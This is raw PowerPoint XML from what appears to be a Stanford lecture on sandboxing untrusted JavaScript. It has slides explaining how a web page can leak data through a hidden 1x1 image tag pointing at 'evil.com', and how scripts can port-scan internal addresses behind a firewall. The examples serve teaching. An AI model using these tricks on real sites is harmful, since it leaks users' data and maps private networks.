            <a:lvl1pPr>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1p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14" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6492875"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1200" u="none">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Sandboxing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="Gill Sans" charset="0"/>
              <a:cs typeface="Gill San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p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="ctr" defTabSz="9144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joost.zeekat.nl/constructors-considered-mildly-confusing.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700" dirty="0" smtClean="0"/>
              <a:t>Safety on the Wild and Wooly World-Wide Web:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sandboxing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> JavaScript </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="4191000"/>
            <a:ext cx="6400800" cy="1447800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>John Mitchell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Stanford</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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t>HTML Image tags</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3627437"/>
            <a:ext cx="8382000" cy="2392363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Communicate with other sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=“http://evil.com/pass-local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>info.jpg?extra_info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Hide resulting image </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=“ … ” height=“1" width=“1"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Spoof other sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Add logos that fool a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26628" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8737600" y="6616700"/>
            <a:ext cx="355600" cy="241300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{092085A5-28E5-4629-9411-16752C16900C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32773" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="5924550"/>
            <a:ext cx="7772400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Important </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Point: A web page can send information to any site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="3124200"/>
            <a:ext cx="7848600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ECD882"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=“http://example.com/sunset.gif” height="50" width="100"&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 4" descr="beach sunset"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4330700" y="1143000"/>
            <a:ext cx="2527300" cy="1895475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1348026"/>
            <a:ext cx="3352800" cy="861774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Web site displays a picture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>issues?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Date Placeholder 9"/>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11" name="Footer Placeholder 10"/>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Port scanning behind firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1276350"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>JavaScript can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Request images from internal IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Example:  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>=“192.168.0.4:8080”/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Use timeout/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>onError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> to determine success/failure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Fingerprint </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>webapps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> using known image names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32772" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="3716338"/>
            <a:ext cx="2436813" cy="846137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32773" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3975100" y="3559175"/>
            <a:ext cx="46038" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32774" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="812800" y="3375025"/>
            <a:ext cx="909638" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32775" name="Picture 8" descr="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5440363" y="3956050"/>
            <a:ext cx="1487487" cy="1138238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125961" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5459413" y="4154488"/>
            <a:ext cx="1387475" cy="796925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32777" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4211638" y="6153150"/>
            <a:ext cx="1046162" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 19"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2700338" y="3448050"/>
            <a:ext cx="3781425" cy="650875"/>
            <a:chOff x="1760" y="2186"/>
            <a:chExt cx="2382" cy="410"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32798" name="Freeform 12"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1760" y="2364"/>
              <a:ext cx="1605" cy="232"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1197"/>
                <a:gd name="T1" fmla="*/ 797 h 211"/>
                <a:gd name="T2" fmla="*/ 38843 w 1197"/>
                <a:gd name="T3" fmla="*/ 5 h 211"/>
                <a:gd name="T4" fmla="*/ 72700 w 1197"/>
                <a:gd name="T5" fmla="*/ 684 h 211"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1197"/>
                <a:gd name="T10" fmla="*/ 0 h 211"/>
                <a:gd name="T11" fmla="*/ 1197 w 1197"/>
                <a:gd name="T12" fmla="*/ 211 h 211"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T6">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T7">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T8">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T9" t="T10" r="T11" b="T12"/>
              <a:pathLst>
                <a:path w="1197" h="211">
                  <a:moveTo>
                    <a:pt x="0" y="211"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="110"/>
                    <a:pt x="441" y="10"/>
                    <a:pt x="640" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="839" y="0"/>
                    <a:pt x="1018" y="90"/>
                    <a:pt x="1197" y="181"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="triangle" w="med" len="med"/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0"/>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32799" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2664" y="2186"/>
              <a:ext cx="1478" cy="173"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1) </a:t>
              </a:r>
              <a:r>
